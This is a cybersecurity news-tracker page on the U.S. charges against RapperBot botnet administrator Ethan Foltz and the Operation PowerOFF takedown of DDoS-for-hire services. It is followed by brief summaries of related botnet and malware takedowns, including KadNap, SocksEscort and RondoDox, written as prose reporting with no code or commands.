CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

RapperBot Botnet Administrator Charged in the U.S.

First reported
Last updated
2 unique sources, 3 articles

Summary

Hide ▲

The RapperBot botnet, operated by Ethan Foltz, has been disrupted as part of the broader international Operation PowerOFF, which has now identified over 75,000 DDoS-for-hire users and taken down 53 domains across 21 countries. The operation, supported by Europol, has arrested four individuals, dismantled illegal booter services, and is transitioning into a prevention phase to curb future misuse. RapperBot has been responsible for over 370,000 DDoS attacks on victims in over 80 countries since 2021, primarily targeting U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet, also known as Eleven Eleven Botnet and CowBot, infected DVRs and Wi-Fi routers to launch attacks and mine Monero. Foltz was charged with aiding and abetting computer intrusions, and the botnet’s command-and-control infrastructure was seized in August 2025. The botnet added a cryptomining module in 2023 and conducted attacks ranging from several terabits to over 1 billion packets per second, with the largest exceeding 6 Tbps. Operation PowerOFF’s latest actions build on prior phases that dismantled key infrastructure and seized databases with over 3 million criminal accounts.

Timeline

  1. 20.08.2025 07:19 3 articles · 8mo ago

    RapperBot botnet administrator charged in the U.S.

    The botnet targeted U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet added a cryptomining module in 2023 to diversify its revenue stream. The attacks ranged from several terabits to over 1 billion packets per second (pps), with the largest attack exceeding 6 Tbps. The botnet has not shown any signs of resurgence in malicious activity following the seizure of its infrastructure on August 6, 2025. Operation PowerOFF, an international effort to dismantle DDoS-for-hire infrastructures, has identified over 75,000 DDoS-for-hire users during its latest phase, leading to the arrest of four individuals, the takedown of 53 domains, and the issuance of 25 search warrants. The operation disrupted illegal booter services by dismantling technical infrastructure and is transitioning into a prevention phase, including awareness campaigns, search engine ad placements targeting young people seeking DDoS tools, removal of over 100 URLs promoting illegal services, and on-chain warning messages tied to illicit payments.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Takedown of fraudulent CSAM distribution scam platform "Alice with Violence CP"

An international Europol-backed law enforcement operation, codenamed Operation Alice, dismantled the fraudulent dark web platform "Alice with Violence CP" and over 373,000 related sites advertising fake child sexual abuse material (CSAM) and cybercrime-as-a-service (CaaS) offerings. The takedown ran from March 9–19, 2026, and involved 22 countries, including Germany, the US, UK, and Ukraine. The platform, operated by a 35-year-old Chinese national, defrauded approximately 10,000 victims into paying between €17 and €215 in Bitcoin, extracting an estimated €345,000 ($396,000) over a six-year period (2019–2025). The scam advertised both non-existent CSAM packages and CaaS services such as stolen card data and access to compromised systems. Authorities identified 440 users in 23 countries, with over 100 under investigation for attempted CSAM purchase. Seized infrastructure included 287 servers, 105 of which were located in Germany. An international arrest warrant has been issued for the operator. The operation follows other major takedowns, including the 2024 Kidflix CSAM platform disruption, highlighting continued cross-border efforts against online child exploitation.

Open in new tab

SocksEscort Proxy Network Disrupted by Law Enforcement

Law enforcement agencies in the U.S. and Europe, along with private partners, have disrupted the SocksEscort cybercrime proxy network. This network relied on edge devices compromised by the AVRecon malware for Linux. The disruption involved taking down multiple servers and domains, freezing cryptocurrency, and disconnecting infected devices. The network had been active for over a decade, offering access to 'clean' IP addresses from major ISPs and facilitating various fraudulent activities. The SocksEscort network had an average of 20,000 infected devices weekly and was used in several high-value fraud cases, including the theft of $1 million in cryptocurrency and losses of $700,000 from a Pennsylvania-based manufacturing business. The network offered access to about 369,000 different IP addresses in 163 countries since summer 2020, with the service listing nearly 8,000 infected routers as of February 2026. The compromised devices were infected through a vulnerability in the residential modems of a specific brand. International law enforcement partners executed Operation Lightning to dismantle the SocksEscort proxy service, which compromised over 360,000 routers and IoT devices in 163 countries since 2020. The operation involved seizing 34 domains and 23 servers in seven countries, freezing $3.5 million in cryptocurrency, and disconnecting all infected devices. The malware enabled various criminal activities, including ransomware, DDoS attacks, and the distribution of child sexual abuse material (CSAM). The payment platform for SocksEscort received almost $6 million from proxy service customers.

Open in new tab

KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

A new botnet named KadNap targets ASUS routers and other edge networking devices, turning them into proxies for malicious traffic. Since August 2025, it has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia Distributed Hash Table (DHT) protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Most infected devices are located in the United States (60%), followed by Taiwan, Hong Kong, and Russia. The infection begins with a malicious script that downloads an ELF binary, establishing persistence via a cron job. The botnet uses NTP servers for time synchronization and a modified Kademlia protocol for communication, making it difficult to identify and disrupt the command-and-control (C2) infrastructure. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet. KadNap malware uses a shell script (aic.sh) downloaded from the C2 server (212.104.141[.]140) to initiate the process of conscripting the victim to the P2P network. The malware creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter, and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.

Open in new tab

International Law Enforcement Disrupts Rhadamanthys, VenomRAT, and Elysium Malware Operations

Law enforcement agencies from 11 countries, coordinated by Europol and Eurojust, disrupted operations of Rhadamanthys infostealer, VenomRAT, and Elysium botnet malware as part of Operation Endgame 3.0. The action, which occurred between November 10 and 13, 2025, involved seizing over 1,000 servers and 20 domains, arresting a key suspect in Greece, and uncovering millions of stolen credentials. The operation also involved multiple private cybersecurity partners. The dismantled infrastructure included hundreds of thousands of infected computers, with the main suspect behind Rhadamanthys having access to over 100,000 crypto wallets worth millions of euros. Victims were often unaware of their systems' infections. The latest version of Rhadamanthys added support for collecting device and web browser fingerprints, along with incorporating several mechanisms to fly under the radar. Additionally, the Dutch police seized around 250 physical servers and thousands of virtual servers used by a bulletproof hosting service, which has been involved in over 80 cybercrime investigations since 2022. The seized servers were located in data centers in The Hague and Zoetermeer.

Open in new tab

RondoDox botnet exploits 56 n-day vulnerabilities in global attacks

The RondoDox botnet has been actively exploiting over 50 vulnerabilities across more than 30 vendors since May 2025. The botnet uses an 'exploit shotgun' strategy to maximize infections, targeting both older and more recent vulnerabilities. The list of exploited vulnerabilities includes CVE-2023-1389, a flaw in the TP-Link Archer AX21 Wi-Fi router, and others demonstrated at Pwn2Own events. In January 2026, the botnet was identified targeting the critical HPE OneView vulnerability CVE-2025-37164, with over 40,000 attack attempts recorded on 7 January. The vulnerability, which has a CVSS 3.1 score of 10 (critical), was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. The botnet's activity poses significant risks, especially for devices that have reached end-of-life and are more likely to remain unpatched. Many users also tend to ignore firmware updates for supported hardware, increasing the risk of exploitation. The botnet targets 35 to 40 vulnerabilities found in consumer-oriented devices, which are often unmanaged and rarely updated. The botnet's impact scale is potentially quite large, though not yet fully known. To mitigate the threat, users are advised to apply the latest firmware updates, replace end-of-life equipment, segment their networks, and use strong, unique passwords.

Open in new tab